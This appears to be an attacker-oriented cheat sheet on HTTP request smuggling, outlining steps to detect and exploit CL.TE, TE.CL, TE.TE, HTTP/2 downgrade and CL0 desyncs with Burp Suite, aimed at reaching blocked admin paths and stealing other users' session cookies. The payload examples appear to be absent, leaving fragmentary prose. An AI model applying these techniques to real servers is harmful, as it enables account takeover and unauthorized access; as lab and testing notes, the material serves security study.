HTTP Req Smuggling
Requirements:
Steps to Exploit:
Identify server architecture:
Determine whether the target is using a proxy server, load balancer, or other intermediary server between the client and the backend server. Tools like
Burp Suite
can help identify whether multiple servers are handling the requests.
Analyze HTTP request handling:
Look for any differences in how the front-end server and the backend server parse requests. In particular, check for discrepancies in how
Content-Length
andTransfer-Encoding
headers are interpreted.
Craft smuggling payload:
Construct an HTTP request that exploits the difference between how the servers parse the headers. For example:
This can cause the front-end server to forward a part of the request as-is to the backend, while the backend might interpret the second request (
GET /admin
) as a separate request.
Test smuggling with tools:
Use tools like
Burp Suite
to send crafted HTTP requests and observe how the server handles them. A successful HTTP Request Smuggling attack might result in the server interpreting multiple requests differently.
Exploit access:
Once smuggling is successful, use the vulnerability to send unauthorized requests (e.g., accessing internal admin pages) or to deliver further attacks, like exploiting XSS or stealing session tokens from other users.
Detection
TE.TE
Duplicate header names are allowed, and the vulnerability is detected as dualchunk, then add an additional header with name and value = Transfer-encoding: cow.
Steal cookie with TE.TE
TE.CL
Access blocked path with smuggling
CL.TE
Access blocked rerources
To get Victim request with cookies to post comment, adjust CL to BIG number to extend smuggled data
H2
Target is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests and fails to adequately sanitize incoming headers. Exploitation is by use of an HTTP/2-exclusive request smuggling vector to steal a victims session cookie and gain access to user's account.
Note: enable the Allow HTTP/2 ALPN override option and change the body of HTTP/2 request to below POST request.
Search is reflected on website
H2.TE desync v10a h2path
Target is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests even if they have an ambiguous length. Steal the session cookie, of the admin visiting the target. The Burp extension, HTTP Request Smuggler will identify the vulnerability as HTTP/2 TE desync v10a (H2.TE) vulnerability.
CL0
Send button, change the send mode to Send group in sequence (single connection).
Last updated